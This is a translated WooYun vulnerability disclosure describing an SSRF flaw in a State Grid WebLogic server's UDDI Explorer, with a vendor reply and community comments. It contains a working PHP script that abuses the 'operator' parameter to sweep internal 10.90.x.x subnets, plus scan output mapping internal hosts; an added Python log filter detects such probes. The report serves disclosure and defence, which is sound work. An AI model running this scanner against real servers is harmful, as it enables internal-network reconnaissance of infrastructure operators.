
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0134123

Title: How I used a certain vulnerability to scan State Grid's internal network

Vendor: State Grid Corporation of China (国家电网公司)

Author: 路人甲

Submitted: 2015-08-14 15:31

Fixed: 2015-10-02 09:48

Published: 2015-10-02 09:48

Vulnerability type: application misconfiguration

Severity: Medium

Self-assessed Rank: 7

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-14: Details sent to the vendor, awaiting vendor handling
2015-08-18: Vendor confirmed; details disclosed to the vendor only
2015-08-28: Details disclosed to core white hats and relevant domain experts
2015-09-07: Details disclosed to regular white hats
2015-09-17: Details disclosed to intern white hats
2015-10-02: Details disclosed to the public

Brief description:

Found with a handy tool

Details:

http://10.90.233.19/ FUck closed
http://10.90.233.20/ FUck closed
http://10.90.233.21/ FUck closed
http://10.90.233.22/ FUck closed
http://10.90.233.23/ FUck closed
http://10.90.233.24/ FUck closed
http://10.90.233.25/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.25/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.26/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.26/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.27/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.27/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.28/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.28/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.29/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.29/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.30/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.30/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.31/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.31/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.32/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.32/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.33/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.33/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.34/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.35/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.36/ FUck closed
http://10.90.233.37/ FUck closed
http://10.90.233.38/ FUck closed
http://10.90.233.39/ FUck closed
http://10.90.233.40/ FUck closed
http://10.90.233.41/ FUck closed
http://10.90.233.42/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.43/ FUck closed
http://10.90.233.44/ FUck closed
http://10.90.233.45/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.46/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.46/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.47/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.47/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.48/ FUck closed
http://10.90.233.49/ FUck closed
http://10.90.233.50/ FUck closed
http://10.90.233.51/ FUck closed
http://10.90.233.52/ FUck closed
http://10.90.233.53/ FUck closed
http://10.90.233.54/ FUck closed
http://10.90.233.55/ FUck closed
http://10.90.233.56/ FUck closed
http://10.90.233.57/ FUck closed
http://10.90.233.58/ FUck closed
http://10.90.233.59/ FUck closed
http://10.90.233.60/ FUck closed
http://10.90.233.61/ FUck closed
http://10.90.233.62/ FUck closed
http://10.90.233.63/ FUck closed
http://10.90.233.64/ FUck closed
http://10.90.233.65/ FUck closed
http://10.90.233.66/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.66/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.67/ FUck closed
http://10.90.233.68/ FUck closed
http://10.90.233.69/ FUck closed
http://10.90.233.70/ FUck closed
http://10.90.233.71/ FUck closed
http://10.90.233.72/ FUck closed
http://10.90.233.73/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.73/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.74/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.74/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.75/ FUck closed

Proof of vulnerability:

[Screenshot: 2222.png]


cat web.php 
<?php
// Usage: php web.php <weblogic-base-url> <single-url>
// Sweeps 10.90.233.0/24 through 10.90.249.0/24 via the WebLogic UDDI Explorer,
// then probes the single URL given as the second argument.
for($m=233;$m<250;$m++){
    for($i=1;$i<254;$i++){
        $url="http://10.90.$m.".$i."/";
        expyou($argv[1],$url);
    }
}
expyou($argv[1],$argv[2]);

// Asks the UDDI Explorer on $target to fetch $url as a "registry operator"
// and prints the error text WebLogic returns, which reveals whether the
// internal address answered.
function expyou($target,$url){
    $result=file_get_contents("$target/uddiexplorer/SearchPublicRegistries.jsp?operator=$url&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search");
    preg_match_all("#An error has occurred<BR>(.*?)</table#is",$result,$info);
    $msg=isset($info[1][0]) ? $info[1][0] : '';  // guard: no error block in the response
    if(strpos($msg,"but could not connect over HTTP to server")!==false){
        echo "$url FUck closed\r\n";
    }else{
        echo $url.trim($msg)."\r\n";
    }
}
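From the defender's side, every probe the script above sends leaves the same trace in the WebLogic access log: a request to /uddiexplorer/SearchPublicRegistries.jsp whose operator parameter names a private or loopback address, repeated once per swept host from a single client. The following filter is an added example written for this page, not code from the report or from WebLogic; the log lines it parses are constructed samples in Common Log Format, and the function names and the 10.0.5.7 / 203.0.113.9 client addresses are illustrative assumptions.

```python
import ipaddress
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); not taken from the report.
SAMPLE_LOG = """\
10.0.5.7 - - [14/Aug/2015:15:20:01 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.90.233.25/&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 4120
10.0.5.7 - - [14/Aug/2015:15:20:02 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F10.90.233.26%2F&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 4120
203.0.113.9 - - [14/Aug/2015:15:21:10 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.com/inquiry&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 980
203.0.113.9 - - [14/Aug/2015:15:21:11 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3301
10.0.5.7 - - [14/Aug/2015:15:22:30 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:7001/&btnSubmit=Search HTTP/1.1" 200 4120
"""

# Minimal CLF parser: client address, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"


def is_internal_target(operator: str) -> bool:
    """True if the operator URL points at a private, loopback or link-local address."""
    host = urlparse(unquote(operator)).hostname
    if host is None:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostnames other than "localhost" would need DNS to classify; treated as external here.
        return host == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local


def find_uddi_probes(log_text: str):
    """Return (source_ip, timestamp, operator_url) for each UDDI Explorer request
    that asks the server to fetch an internal address."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urlparse(m.group("path"))
        if parsed.path != UDDI_PATH:
            continue
        # parse_qs already percent-decodes values, so both encoded and plain forms are caught.
        for operator in parse_qs(parsed.query).get("operator", []):
            if is_internal_target(operator):
                hits.append((m.group("src"), m.group("ts"), unquote(operator)))
    return hits


def summarize_by_source(hits):
    """Count internal-target probes per client; one client hitting many addresses
    in quick succession is the sweep pattern produced by the script above."""
    counts = {}
    for src, _, _ in hits:
        counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    probes = find_uddi_probes(SAMPLE_LOG)
    for src, ts, target in probes:
        print(f"{ts} {src} -> UDDI Explorer asked to fetch {target}")
    print(summarize_by_source(probes))
```

The request to uddi.example.com is deliberately left unflagged: a legitimate public registry lookup looks identical apart from the target address, so the classifier keys on where the server is being asked to connect, not on the endpoint alone. The simplest fix remains not exposing the UDDI Explorer application at all; where it must stay, this kind of filter over the access log is the cheap way to notice a sweep in progress.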

Remediation:

Copyright notice: please credit the source when reposting, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-08-18 09:47

Vendor reply:

Thanks for your effort. A notice to handle this vulnerability had already been issued before the reporter submitted it, but we still thank the reporter for the submission.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-08-14 15:49 | 紫衣大侠 ( Regular White Hat | Rank:201 Vulns:21 | Wishing to befriend insightful people everywhere)

    SSRF ?

  2. 2015-08-14 16:48 | qhwlpg ( Regular White Hat | Rank:226 Vulns:54 | Devoted to code auditing.)

    SSRF ?

  3. 2015-08-14 17:24 | 啊L川 ( Regular White Hat | Rank:195 Vulns:39 | Newbie, noob, so noob!)

    SSRF ?

  4. 2015-08-14 17:30 | 一只猿 ( Regular White Hat | Rank:463 Vulns:89 | Hardware and wireless communication research)

    SSRF ?

  5. 2015-08-14 18:05 | 牛 小 帅 ( Regular White Hat | Rank:371 Vulns:86 | [code]If the heart has no place to rest, wherever you go you are...)

    Haha, saving a spot

  6. 2015-08-14 18:41 | scanf ( Core White Hat | Rank:1252 Vulns:188 | 。)

    Passing by

  7. 2015-08-14 19:01 | ChristopereRussell ( Passer-by | Rank:1 Vulns:1 | A high school student who loves computers)

    Pity that ordinary electricity meter top-ups aren't networked... not much use, I guess...

  8. 2015-08-14 20:24 | 白无常 ( Intern White Hat | Rank:43 Vulns:5 )

    Selling 3D glasses and sunflower seeds

  9. 2015-08-14 23:47 | 小龙 ( Regular White Hat | Rank:1242 Vulns:317 | WooYun has a group of people who learn skills at WooYun and go to a certain...)

    Just looked at the approach, nice, very clear thinking ^_^